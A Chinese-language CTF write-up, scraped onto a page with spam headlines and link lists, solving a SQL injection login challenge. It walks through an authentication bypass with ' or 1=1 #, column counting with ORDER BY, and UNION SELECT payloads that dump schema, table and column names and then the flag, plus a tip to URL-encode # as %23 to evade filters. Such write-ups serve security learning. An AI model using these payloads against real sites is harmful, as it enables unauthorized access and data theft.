当前位置: 首页 > news >正文

做网站需准备些什么问题新发布的新闻

做网站需准备些什么问题,新发布的新闻,汉中网络推广,一个人做网站 优帮云一、题目简介: 二、通关思路: 1、首先查看页面源代码: 我们发现可以使用工具sqlmap来拿到flag,我们先尝试手动注入。 2、 打开靶机,映入眼帘的是登录界面,首先尝试万能密码能否破解。 username: 1 or 11…

一、题目简介

二、通关思路

1、首先查看页面源代码:

我们发现可以使用工具sqlmap来拿到flag,我们先尝试手动注入。

2、 打开靶机,映入眼帘的是登录界面,首先尝试万能密码能否破解。

username: 1' or 1=1 #
password: 随便写任意值

提交submit,发现可以登录:

 并在 Your password 处发现一段乱码,疑似为flag,提交发现错误,这并不是flag,说明flag在别处。

3、通过万能密码已知,注入类型为 字符型,闭合方式为 单引号闭合,尝试查看字段数量。

当 order by 3 时,页面显示如图:

当 order by 4 时,页面显示如图:

Unknown column 4,说明页面报错了,说明字段数为3。

注:这里#使用URL编码格式:% + 十六进制数,目的是防止被过滤,在本题目中若使用 # 或 --+是无法检测出字段数量的,所以在以后的sql注入题目中,最好使用%23。

4、查看回显:

1' union select 1,2,3 %23

 

5、发现回显位 ,开始注出数据库库名,表名,列明,最终拿到flag。

注出库名:
1' union select 1,2,database() %23

 

注出表名:
1' union select 1,2,(select group_concat(table_name)from information_schema.tables where table_schema=database()) %23

 

注出列名:
1' union select 1,2,(select group_concat(column_name)from information_schema.columns where table_name='l0ve1ysq1') %23

 

 

拿到flag:
1' union select 1,2,(select group_concat(id,username,password) from l0ve1ysq1) %23

 

成功拿到flag,通关。

http://www.tj-hxxt.cn/news/73751.html

相关文章:

  • 网站建设丷金手指专业十五杭州百度优化
  • 温州哪里有做网站的河南关键词优化搜索
  • 专业柳州网站建设公司长春百度推广排名优化
  • 建设计公司网站要多少钱深圳seo
  • 做网站的资料友情连接
  • 中国设备网sem 优化软件
  • 做网站seo怎么赚钱推广文章的推广渠道
  • 网站建设肆金手指排名8网络推广外包联系方式
  • 全国住房与城乡建设部网站seo云优化平台
  • php网站 mysql数据库又一病毒来了比新冠可怕
  • 网页制作收入百度关键词优化曝光行者seo
  • 企业网站管理系统设置查权重的软件
  • a站全名叫什么seo快速排名服务
  • 重庆铜梁政府官网网站百度指数网
  • 张家港网站建设制作seo类目链接优化
  • 做资源网站有哪些合肥网站制作推广
  • 找人做的网站第二年多钱网站推广建站
  • wordpress首页点击图片弹出视频沧州搜索引擎优化
  • 衡粘水佩网站建设营销计划书7个步骤
  • 上海微信网站设计制作优化建站seo门户
  • 麻将网站怎么做的怎么优化网站
  • 成都网站建设与维护软文案例大全
  • 免费发做网站网络平台怎么推广
  • 制作微信公众的网站开发新媒体运营怎么自学
  • 阳江专业手机网站制作公司seo中国官网
  • 地方性网站商城怎么做全网热搜榜第一名
  • 无锡网站建设 微信搜索引擎优化排名品牌
  • 雅安网站建设网站的营销推广方案
  • 如何在文本上做网站链接符号宣传推广的形式有哪些
  • 四川法制建设网站营销策划公司排名